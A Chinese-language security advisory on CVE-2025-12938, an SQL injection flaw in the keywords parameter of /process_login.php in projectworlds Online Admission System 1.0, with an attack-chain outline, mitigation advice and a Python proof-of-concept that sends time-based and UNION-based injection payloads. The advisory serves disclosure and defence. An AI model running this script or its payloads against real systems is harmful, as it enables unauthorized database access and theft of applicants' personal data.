CVE-2025-12938: projectworlds在线招生系统process

漏洞信息

漏洞编号

CVE-2025-12938

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

projectworlds Online Admission System 1.0

漏洞概述

CVE-2025-12938是projectworlds在线招生系统1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于/process_login.php文件中的keywords参数，攻击者可以通过构造恶意的SQL语句实现未授权的数据库操作。该漏洞的CVSS评分为7.3，属于高危级别，攻击向量为网络形式，无需任何认证和用户交互即可发起攻击。由于该漏洞的利用代码已在公开渠道发布，攻击者可以轻松获取并使用，这大大增加了漏洞被恶意利用的风险。projectworlds Online Admission System是一款用于教育机构的在线招生管理平台，广泛应用于学校的招生流程管理。该系统处理大量敏感的学员信息，包括个人身份信息、联系方式、学历背景等。一旦攻击者成功利用此漏洞，可能导致以下严重后果：1）窃取数据库中的敏感学员信息；2）绕过系统认证机制获取管理员权限；3）修改或删除招生数据，影响招生工作的正常进行；4）在某些情况下，可能进一步导致服务器被完全控制。该漏洞的存在表明系统在用户输入处理方面存在严重的安全缺陷，未对用户提交的数据进行充分的过滤和验证。

技术细节

该SQL注入漏洞存在于projectworlds在线招生系统的/process_login.php文件中，具体问题出在对keywords参数的处理上。系统在接受用户输入的keywords参数后，直接将其用于SQL查询语句的构造，而未进行任何形式的输入过滤、转义或使用参数化查询。当攻击者向/process_login.php页面提交包含SQL特殊字符和命令的keywords参数时，这些恶意输入会被直接拼接到SQL查询语句中执行。例如，攻击者可以通过构造如'union select 1,2,3,4,5--等联合查询语句，或使用布尔型、时间型盲注技术，逐步获取数据库中的敏感信息。漏洞的利用过程如下：首先，攻击者需要识别目标系统中存在该漏洞的接入点，即/process_login.php页面。然后，通过自动化工具或手工构造SQL注入载荷，对keywords参数进行测试。在确认漏洞存在后，攻击者可以使用sqlmap等自动化工具快速提取数据库内容，包括用户表、管理员账号、密码哈希等敏感信息。由于该漏洞的CVSS向量显示攻击复杂度低（AC:L），且不需要任何认证（PR:N），因此攻击难度极低。此外，该漏洞的CIA影响均为低级别（C:L/I:L/A:L），但在实际攻击场景中，攻击者可能通过SQL注入进一步获取更高权限或执行系统命令。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站使用的技术栈和结构，通过扫描发现/process_login.php端点存在

STEP 2

步骤2: 漏洞探测

攻击者使用自动化工具（如sqlmap）或手工构造SQL注入测试载荷，对keywords参数进行测试，确认漏洞存在

STEP 3

步骤3: 构造恶意载荷

根据目标数据库类型，构造针对性的SQL注入载荷，如联合查询、布尔盲注或时间盲注

STEP 4

步骤4: 数据库枚举

利用SQL注入漏洞逐步获取数据库结构信息，包括表名、列名、用户数据等敏感信息

STEP 5

步骤5: 权限提升

如果获取到管理员凭据，可尝试登录后台管理系统，获取更高权限

STEP 6

步骤6: 持久化控制

在某些情况下，攻击者可能通过SQL注入进一步写入Webshell，实现服务器持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12938 PoC - SQL Injection in projectworlds Online Admission System 1.0
# Target: /process_login.php keywords parameter

def exploit_sql_injection(target_url):
    """
    SQL Injection PoC for CVE-2025-12938
    This PoC demonstrates a time-based blind SQL injection vulnerability
    """
    
    # Target endpoint
    endpoint = f"{target_url}/process_login.php"
    
    # Payload for time-based blind SQL injection
    # This payload causes a 5-second delay if vulnerable
    payload = {
        'keywords': "' OR SLEEP(5)-- -",
        'submit': 'Search'
    }
    
    print(f"[*] Testing target: {endpoint}")
    print(f"[*] Payload: {payload['keywords']}")
    
    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        print(f"[+] Response status: {response.status_code}")
        print(f"[+] Response length: {len(response.text)}")
        
        # Check for SQL error messages in response
        if 'mysql' in response.text.lower() or 'sql' in response.text.lower():
            print("[!] Potential SQL error detected in response")
            
    except requests.exceptions.Timeout:
        print("[+] Time-based blind SQL injection confirmed!")
        print("[+] Server responded after 5 seconds delay")
        return True
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

def extract_database_info(target_url):
    """
    Extract database information using UNION-based injection
    """
    
    # UNION-based SQL injection payload to extract database name
    payload = {
        'keywords': "' UNION SELECT 1,database(),3,4,5-- -",
        'submit': 'Search'
    }
    
    endpoint = f"{target_url}/process_login.php"
    
    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        # Parse response to extract database name
        print("[*] Extracting database information...")
        # Additional parsing logic would be needed here
    except Exception as e:
        print(f"[-] Error: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sql_injection(target)

影响范围

projectworlds Online Admission System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，可以采取以下临时缓解措施：1）通过Web应用防火墙规则拦截包含SQL特殊字符的请求；2）在网络层限制对/process_login.php端点的访问；3）暂时禁用搜索功能或对keywords参数进行严格的输入过滤；4）监控数据库查询日志，及时发现异常SQL语句；5）加强对数据库服务器的访问控制，限制应用程序账户的权限范围。建议尽快联系系统开发商获取官方安全补丁或考虑使用其他安全的招生管理系统替代。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12938
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12938
3 Details https://www.cvedetails.com/cve/CVE-2025-12938/
4 VulDB https://vuldb.com/cve/CVE-2025-12938
5 Link https://github.com/juzidddd/CVE/issues/1
6 Link https://vuldb.com/?ctiid.331662
7 Link https://vuldb.com/?id.331662
8 Link https://vuldb.com/?submit.682313

CVE-2025-12938: projectworlds在线招生系统process_login.php SQL注入漏洞